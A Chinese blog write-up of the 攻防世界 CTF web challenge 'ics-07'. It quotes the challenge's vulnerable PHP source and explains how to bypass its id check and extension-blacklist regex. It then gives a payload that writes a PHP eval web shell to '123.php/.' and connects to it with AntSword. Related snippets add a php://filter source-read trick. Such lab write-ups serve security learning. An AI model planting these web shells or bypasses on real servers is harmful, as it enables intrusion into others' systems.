攻防世界Web:ics-07

最新推荐文章于 2023-09-11 05:37:30 发布
最新推荐文章于 2023-09-11 05:37:30 发布
阅读量118 收藏
点赞数
分类专栏: CTF 文章标签: 正则表达式 php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Light_inthe_eyes/article/details/120807376
版权

打开项目管理页面:
在这里插入图片描述
发现有个view-source,点进去有代码,看关键代码:

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

分析代码:

  1. id的开头是1,结尾是9,构造id=1/9:
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9')

在这里插入图片描述

2.$con是文件内容,$file是文件名,这里需要注意的是$filename = "backup/".$file是一个假的路径,因为后面chdir('uploaded')是修改了路径的;

preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)

正则表达式过滤了最后的一个"."。

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

构造payload:

con=<?php @eval(&_POST['123']);?>&file=../123.php/.

中国蚁剑连接成功,找到flag:
在这里插入图片描述
总结:
正则表达式

dofd
关注
专栏目录
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1335
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
BUUCTF:[BJDCTF2020]ZJCTF,不过如此 && 攻防世界webics-05 -- -preg_replace + /e 的任意代码执行漏洞
Zero_Adam的博客
02-13 377
不足: 在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去??? 这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 看到正则+str_replace,+ e 修正符,想到的是RCE!?!!。 知识点:/e模式的preg_repl
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4619
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界-ics-07
m0_47571887的博客
11-21 2168
之前遇到过类似的题,考的sql注入,不过这个考的文件上传 打开题目,还是一个工控系统,继续按流程走,瞎点看看哪个能点开,最后只有项目管理才能点开. 看到有个view-source,点进去看一看,有三段代码,我们来分析分析。 提交page参数,不能包含index.php,只能包含flag.php 提交con和file参数,更改backup路径为uploaded,if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i',$filename))还对这些字符进行了..
攻防世界----ics-07
qq_44418229的博客
07-26 458
攻防世界---ics-07 分析源码+正则
攻防世界CTF | WP】ics-07
ethan18的博客
02-01 2230
攻防世界CTF | WP】ics-07题目思路查看界面 题目 思路 查看界面 打开题目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下 我们看到有一个源代码链接,点击链接的源代码如下 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) &&
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 728
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4634
尝试
攻防世界 web高手进阶区 8分题 ics-02
闵行小鱼塘
10-04 622
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是ics-02的writeup
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 606
攻防世界WEB】五星15分
【愚公系列】2023年06月 攻防世界-Webics-07
时光隧道
06-15 4170
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界-web-ics-07-从0到1的解题历程writeup
CTF小白的博客
04-17 3378
题目分析 首先拿到题目描述:工控云管理系统项目管理页面解析漏洞 找到题目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 1069
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
XCTF-高手进阶区:ics-07
1stPeak's Blog
04-14 603
题目: 发现view-source <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start...
攻防世界ics-5wp
T19er的博客
07-10 2884
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
ISCC(web)暴力破解
Watson的博客
05-23 688
web2 暴力破解 题目地址:http://39.100.83.188:8002 发现这是一个已经给了用户名 只需要破解三位数字密码即可 有验证码需要通过验证码 随便输入一个密码 将验证码输入进去 通过burp抓包然后爆破 如下(输入完之后先不要点击submit) 此时,打开burp,设置好代理(这里不懂的自己查一下burp使用教程,里边有详细介绍) 然后点击submit 你会看到burp...
小学期分组对抗赛WP
最新发布
zinc_96的博客
09-11 658
Windows系统:版本 Windows 11 专业版版本 23H2安装日期 ‎2023-‎07-‎20操作系统版本 22631.2271体验 Windows Feature Experience Pack 1000.22674.1000.0Kali系统:Linux Stark 6.4.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.4.11-1kali1 (2023-08-21) x86_64 GNU/Linux。
攻防世界练习题web
果果的csdn
06-12 1160
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,读到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
[wp] 攻防世界 isc-07
MercyLin的博客
09-16 977
首先看源代码里的这一段: if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'config.php'; $id = mysql_real_escape_string($_GET[id]); ...
攻防世界 ics-07
09-05
攻防世界是一个国际性的网络安全竞赛,其中 ICS-07 是指第七届工控系统安全挑战赛(Industrial Control System Security Challenge)。个比赛主要关注工控系统安全领域,参赛者需要在模拟的工控环境中进行攻击和防御...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值